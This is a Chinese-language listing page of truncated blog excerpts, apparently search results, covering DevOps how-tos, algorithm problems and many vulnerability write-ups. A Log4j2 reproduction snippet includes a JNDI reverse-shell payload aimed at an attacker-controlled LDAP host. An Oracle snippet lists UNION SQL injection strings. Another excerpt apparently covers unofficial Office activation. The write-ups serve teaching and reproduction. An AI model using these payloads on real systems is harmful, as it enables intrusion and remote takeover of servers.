2021漏洞cve qemu

layout: post cid: 34 title: Ansible 安装并简单使用 slug: 34 date: 2021/12/30 17:07:00 updated: 2022/03/25 15:48:24 status: publish author: cby categories: 默认 ......

layout: post cid: 60 title: Docker容器中使用GPU slug: 60 date: 2021/12/30 17:13:00 updated: 2022/03/25 15:42:19 status: publish author: cby categories: 默认分 ......

layout: post cid: 25 title: CentOS8删除boot目录恢复 slug: 25 date: 2021/12/30 17:03:48 updated: 2021/12/30 17:03:48 status: publish author: cby categories: ......

layout: post cid: 7 title: k8s集群进行删除并添加node节点 slug: 7 date: 2021/12/30 16:58:32 updated: 2021/12/30 16:58:32 status: publish author: cby categories: 默 ......

layout: post cid: 21 title: CentOS 的 YUM安装时卡死解决方案 slug: 21 date: 2021/12/30 17:03:00 updated: 2021/12/30 17:03:00 status: publish author: cby categori ......

layout: post cid: 5 title: Docker启动MySQL、MongoDB、Redis、Elasticsearch、Grafana，数据库 slug: 5 date: 2021/12/30 16:57:00 updated: 2022/03/25 15:53:08 status ......

反序列化漏洞 反序列化漏洞一、漏洞原理相关概念什么是序列化与反序列化？漏洞成因常见魔术方法总结二、漏洞危害三、漏洞出现场景四、检测方法五、防御六、漏洞复现 一、漏洞原理 相关概念 什么是序列化与反序列化？ 序列化：把对象的状态信息转换为可以存储或传输的形式的过程，一般是将对象转换为字节流。在进行序列 ......

堆块chunk介绍及unlink漏洞利用原理 chunk结构 当进程动态分配内存时，系统会在堆中创建一个chunk（堆块）。chunk包含chunk头和chunk体两部分 chunk头中有两个字段： prev_size：前一个chunk的size，前指的之前分配的内存，也就是低地址相邻的chunk ......

漏洞起源于前段时间比较火的小皮 1-click 漏洞，用户名登录处缺少过滤，导致可以直接构造恶意 payload 实现存储型 XSS ，结合小皮本身所具有的计划任务，XSS + CSRF 实现了 RCE 。 因为用户名登录处缺少过滤，所以可以尝试 SQL 漏洞。 ......

平台：ubuntu 22.04对象：qemu仿真ARM64.文件：linux-5.10.7、busybox-1.33.1 1.安装依赖 $ sudo apt install build-essential bc flex bison gawk texinfo file tree curl wget ......

golang CVE-2016-2183漏洞，https需要添加tls设置加密算法白名单，将弱加密算法DES和3DES去掉。 服务端样例代码 package main import ( "crypto/tls" "fmt" "net/http" ) func handler(writer http. ......

打开软件 选择应用 版本是office21pro 等安装完成 打开学习工具，第一次打开提示无法联网需要重新打开即可 目测安装21所有许可证 退出即可 打开office 点完这个关闭后 进入账户即可看到激活 ......

文件包含渗透 1.项目实验环境 2.原理及危害 文件包含漏洞: 即File Inclusion ,意思是文件包含(漏洞)，是指当服务器开启allow_url_include选项时,就可以通过php的某些特性函数( include() , require()和include_once() ，requi ......

文件上传漏洞原理 1、文件上传( File Upload )是大部分web应用都具备的功能，例如用户上传附件、修改头像、分享图片/视频等 2、正常的文件一般是文档、 图片、视频等, Web应用收集之后放入后台存储,需要的时候再调用出来返回 3、如果恶意文件如PHP、ASP等执行文件绕过Web应用,并 ......

OWASP TOP 10 2021 2021 年的 TOP 10 中有 3 个新类别、4 个更改了名称和范围的类别以及一些合并。 A01. 失效的访问控制 Broken Access Control 失效的访问控制是指应用程序中的访问控制措施没有被正确实施或没有被充分考虑，从而导致攻击者能够绕过访问 ......

发现主机后进行目录扫描，发现登录口标注了CMS的版本，查看该类型CMS有没有漏洞，针对漏洞去github搜索脚本，拿到脚本后运行得到靶机的初级Shell,根据靶机内的文件内容指示使用ht编辑器，利用编辑器去修改用户的权限然后提权，拿到root权限结束 ......

一 》》》》》》》》》》》》》》》》》》》》》》》》》》》》》》》》》》》》》》》》》》》》》》 下载nacos https://github.com/alibaba/nacos nacos-server-2.0.3.zip Windows 版 解压后，数据库新建nacos库，将 X:\nacos\ ......

经典 01 背包题 首先介绍一下 01 背包，即一种 DP 问题，以放置物品为模型，每个物品只能放一次。其区分于完全背包（每个物品可以放无限多次），以及多重背包（每个物品有一个固定次数上限）。题中给出了 $ N $ 个砝码及每个砝码的质量，要求我们求出可以称出质量的种数。由此想到转化为 01 背包。 ......

为什么可以使用前缀和，这里提供解释： 初读题目，我们发现这个数列很迷惑，似乎不能使用数学方法来解。 $$ 1,1,2,1,2,3,1,2,3,4,\cdots $$ 但是，我们可以想到 数形结合 的方式，我们将数列看作一个三角形，于是他变成了： $$1$$ $$1,2$$ $$1,2,3$$ $$1 ......

平台：ubuntu 22.04对象：Qemu仿真OpenWRT.文件：openwrt 1.安装依赖 $ sudo apt install build-essential bc flex bison gawk git unzip curl wget texinfo libssl-dev libncur ......

Microsoft office2021简体中文版是一款非常受人欢迎的办公软件，包含了 Word 、Excel、PowerPoint、OneNote、Lync、Publisher和Access等等多款组件，支持独立打开使用，满足用户的所有使用需求，大为改善的操作界面，能够自动创建书签，内置图像搜索功 ......

考虑归并排序，难点在于怎样合并两个有序序列。 我们假设要合并两个有序序列 $A,B$，不妨假设 $|A|>|B|$，考虑以下过程： 将 $|A|$ 中的元素按下标奇偶性分成两个序列 $A_0,A_1$。 递归合并 $A_0$ 与 $B$。 将 $A_1$ 中的元素插入 $A_0$ 与 $B$ 得到的 ......

首先先手玩一下所有点的 $x$ 都相同的情况，你会发现存在解的必要条件是所有黑点的 $y$ 构成一段连续的区间，此时答案为 $(X+R-L,L)$，其中 $L,R$ 为所有点中纵坐标的最小和最大值。 受这个思想启发，我们考虑将所有点都变到同一 $x$ 坐标上，设 $X=\min{x_i}$。那么显然 ......

【1】漏洞原理：Log4j2默认支持解析ldap/rmi协议(只要打印的日志中包括ldap/rmi协议 即可)【2】复现：（1）启动靶场环境：（2）反弹shell：http://靶机ip:8983/solr/admin/cores?action=${jndi:ldap://攻击机ip:1389/Ba ......

#Oracle 参考：https://www.cnblogs.com/peterpan0707007/p/8242119.html 测回显：and 1=2 union select '1','2' from dual 爆库：and 1=2 union select '1',(select table ......

因为docker赋有远程的远程控制，docker开放了一个tcp端口2375，如果没有限制访问的话，攻击者就会通过这个端口来通过docker未授权来获取服务器权限。 ......

摘要：SSRF (Server-Side Request Forgery，服务器端请求伪造)是指由攻击者构造请求，然后利用服务器的漏洞以服务端的身份向内网发送请求对内网发起攻击。 本文分享自华为云社区《GaussDB(DWS)安全测试之SSRF漏洞》，作者： ACBD。 1. 什么是SSRF漏洞 S ......

PfSense pfBlockerNG 未授权RCE漏洞（CVE-2022-31814） 概述 PfSense系统的插件pfBlockerNG引起的未授权RCE漏洞 pfSense是一个基于FreeBSD操作系统开发的防火墙和路由器软件 FreeBSD 是一种类UNIX操作系统 pfBlockerN ......

漏洞概述 dirty cow漏洞是一种发生在写时复制的竞态条件产生的漏洞 写时复制(copy on write) 允许不同进程中的虚拟内存映射到相同物理内存页面的技术 三个重要流程 A:制作映射内存的副本 B:更新页表,是的虚拟内存指向新创建的物理内存 C 写入内存 tips:他们可以被其他线程中断 ......

做题链接：A组 B组 C组 填空题 卡片 直接模拟。 展开代码 #include <bits/stdc++.h> using ll = long long; int main() { std::cin.tie(nullptr)->sync_with_stdio(false); std::map<ch ......